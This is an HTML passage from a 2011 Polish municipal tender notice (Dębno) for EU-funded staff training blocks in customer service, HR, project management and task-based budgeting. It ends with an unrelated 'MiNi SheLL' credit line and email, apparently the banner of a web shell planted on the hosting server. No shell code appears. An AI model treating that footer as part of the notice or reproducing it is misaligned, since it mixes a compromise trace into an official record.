d.	zmiany harmonogramu realizacji zamówienia oraz terminów poszczególnych szkoleń - w zależności od możliwości organizacyjnych uczestników szkoleń,
e.	zmiany podwykonawcy, jeżeli podwykonawca nie został zaakceptowany przez Zamawiającego, nie wykonuje prac z należytą starannością, uległ likwidacji lub doszło do rozwiązania umowy łączącej go z Wykonawcą,
f.	ewentualnego ograniczenia zakresu przedmiotu umowy, w przypadku wystąpienia nieprzewidzianych, nadzwyczajnych okoliczności lub zmian organizacyjnych w projekcie. W takiej sytuacji Zamawiający zastrzega sobie prawo do obniżenia ustalonego w umowie wynagrodzenia o wartość przedmiotu umowy podlegającego wyłączeniu. Zamawiający zastrzega możliwość przeszkolenia o maks. 40% mniejszej liczby uczestników niż podano w siwz oraz rezygnacji z określonych tematów szkoleń. Wykonawca otrzyma wtedy wynagrodzenie proporcjonalne do liczby uczestników szkolenia i przeprowadzonych dni szkoleniowych. Zamawiający zastrzega sobie możliwość rezygnacji z niektórych szkoleń w przypadku nie realizowania zamówienia zgodnie z harmonogramem projektu UE lub zmian treści projektu.
g.	nastąpiła zmiana stawki podatku od towarów i usług VAT, w takim przypadku umowa ulegnie zmianie w zakresie wysokości ceny brutto bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.debno.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.bip.debno.com.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2011 godzina 09:45, miejsce: w siedzibie Urzędu Miejskiego w Dębnie,  ul. Piłsudskiego 5, 74-400 Dębno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Blok szkoleń z zakresu obsługi klientów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie  bloku szkoleniowego (usługa szkoleniowa) dla pracowników 11 Jednostek Samorządu Terytorialnego (JST) w ramach projektu Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej - zwanego dalej Projektem. W szczególności przedmiot zamówienia obejmuje:
a.	Pozyskanie trenerów,
b.	Przeprowadzenie szkoleń,
c.	Dostarczenie cateringu,
d.	Opracowanie i przekazanie materiałów szkoleniowych,
e.	Opracowanie i przeprowadzenie testów wiedzy,
f.	Opracowanie i wydanie certyfikatów ukończenia szkoleń,
g.	Sporządzanie wymaganej w siwz dokumentacji szkoleń.

Zakres części zamówienia: 
1)	Szkolenie pn. Komunikacja z klientem (2 dni szkoleniowe, max. 120 uczestników, 8 grup szkoleniowych)
2)	Szkolenie pn. Sytuacje trudne w obsłudze klienta - strategie skutecznego działania (1 dzień szkoleniowy, max. 90 uczestników, 7 grup szkoleniowych)
3)	Szkolenie pn. Rozumienie potrzeb i zachowań klienta (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
4)	Szkolenie pn. Jak postępować ze skargami i wnioskami (2 dni szkoleniowe, max. 90 uczestników, 7 grup szkoleniowych)
5)	Warsztaty pn. Styl urzędniczy - formułowanie pism (1 dzień szkoleniowy, max. 110 uczestników, 8 grup szkoleniowych)
6)	Szkolenie pn. Kryteria poprawności językowej pism urzędniczych (2 dni szkoleniowe, max. 95 uczestników, 7 grup szkoleniowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba wykonanych usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Blok szkoleń z zakresu zarządzania zasobami ludzkimi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie  bloku szkoleniowego (usługa szkoleniowa) dla pracowników 11 Jednostek Samorządu Terytorialnego (JST) w ramach projektu Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej - zwanego dalej Projektem. W szczególności przedmiot zamówienia obejmuje:
a.	Pozyskanie trenerów,
b.	Przeprowadzenie szkoleń,
c.	Dostarczenie cateringu,
d.	Opracowanie i przekazanie materiałów szkoleniowych,
e.	Opracowanie i przeprowadzenie testów wiedzy,
f.	Opracowanie i wydanie certyfikatów ukończenia szkoleń,
g.	Sporządzanie wymaganej w siwz dokumentacji szkoleń.

Zakres części zamówienia: 
1)	Szkolenie pn. Zarządzanie zasobami ludzkimi z psychologicznego punktu widzenia (1 dzień szkoleniowy, max. 70 uczestników, 5 grup szkoleniowych)
2)	Szkolenie pn. Rekrutacja i selekcja pracowników (1 dzień szkoleniowy, max. 60 uczestników, 4 grupy szkoleniowe)
3)	Szkolenie pn. Motywowanie pracowników (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe)
4)	Szkolenie pn. Ocenianie pracowników (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe)
5)	Warsztaty pn. Proces zarządzania zasobami ludzkimi w praktyce (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba wykonanych usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3.	Blok szkoleń z zakresu zarządzania przez projekty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie  bloku szkoleniowego (usługa szkoleniowa) dla pracowników 11 Jednostek Samorządu Terytorialnego (JST) w ramach projektu Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej - zwanego dalej Projektem. W szczególności przedmiot zamówienia obejmuje:
a.	Pozyskanie trenerów,
b.	Przeprowadzenie szkoleń,
c.	Dostarczenie cateringu,
d.	Opracowanie i przekazanie materiałów szkoleniowych,
e.	Opracowanie i przeprowadzenie testów wiedzy,
f.	Opracowanie i wydanie certyfikatów ukończenia szkoleń,
g.	Sporządzanie wymaganej w siwz dokumentacji szkoleń.

Zakres części zamówienia: 
1)	Szkolenie pn. Metodyka Project Management (4 dni szkoleniowe, max. 50 uczestników, 4 grupy szkoleniowe)
2)	Szkolenie pn. Aspekty finansowe projektu (2 dni szkoleniowe, max. 55 uczestników, 4 grupy szkoleniowe)
3)	Szkolenie pn. Komunikacja i praca zespołowa w projekcie (1 dzień szkoleniowy, max. 50 uczestników, 4 grupy szkoleniowe)
4)	Szkolenie pn. Zarządzanie ryzykiem w projekcie (2 dni szkoleniowe, max. 55 uczestników, 4 grupy szkoleniowe)
5)	Szkolenie pn. Prawne aspekty umów (1 dzień szkoleniowy, max. 55 uczestników, 4 grupy szkoleniowe).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba wykonanych usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4.	Blok szkoleń z zakresu budżetu zadaniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie  bloku szkoleniowego (usługa szkoleniowa) dla pracowników 11 Jednostek Samorządu Terytorialnego (JST) w ramach projektu Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej - zwanego dalej Projektem. W szczególności przedmiot zamówienia obejmuje:
a.	Pozyskanie trenerów,
b.	Przeprowadzenie szkoleń,
c.	Dostarczenie cateringu,
d.	Opracowanie i przekazanie materiałów szkoleniowych,
e.	Opracowanie i przeprowadzenie testów wiedzy,
f.	Opracowanie i wydanie certyfikatów ukończenia szkoleń,
g.	Sporządzanie wymaganej w siwz dokumentacji szkoleń.

Zakres części zamówienia: 
1)	Szkolenie pn. Budżet zadaniowy - podstawowe pojęcia (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
2)	Szkolenie pn. Mierniki wykonania zadań i stopnia realizacji (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
3)	Szkolenie pn. Wdrożenie budżetu zadaniowego (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
4)	Szkolenie pn. Zamknięcie ksiąg rachunkowych jst i jej jednostek organizacyjnych (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
5)	Szkolenie pn. Budżet zadaniowy a planowanie wieloletnie (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
6)	Warsztaty pn. Wybrane zagadnienia praktyczne (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. liczba wykonanych usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com